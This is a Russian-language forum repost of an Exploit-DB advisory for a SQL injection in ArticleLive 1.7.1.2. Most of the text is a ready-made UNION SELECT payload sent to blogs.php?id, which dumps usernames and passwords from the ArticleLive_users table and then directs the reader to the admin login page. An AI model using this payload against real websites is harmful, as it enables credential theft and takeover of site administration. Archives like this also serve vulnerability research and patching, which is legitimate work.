Exploit ArticleLive 1.7.1.2 - 'blogs.php?Id' SQL Injection

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
10884
Проверка EDB
  1. Пройдено
Автор
BAYBORA
Тип уязвимости
WEBAPPS
Платформа
ASP
CVE
N/A
Дата публикации
2010-01-01
Код:
*******************************************************************************
# Author   : Baybora
# Product  : ArticleLive (Interspire Website Publisher)
# Version  : NX.1.7.1.2 (and possibly earlier versions)
# Download : http://www.interspire.com/
# Price    : $ 249
# Site     : www.1923turk.biz

 
Vulnerable script: blogs.php?Id = (SQL-injection)

---------------------------------------------------------


http://server/[path]//blogs.php?id=  [SQL Inject]


blogs.php?id=-768+union+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,144,15,16,17,18,19,20,21,22,23,24,25,26,27+from+ArticleLive_users+limit+01--


Admin Login->


http://server/[path]/admin/


"""""""""""""""""""""

Gamoscu - Manas58 - Delibey - Tiamo - Psiko - Turco - infazci - X-TRO
 
Источник
www.exploit-db.com

Похожие темы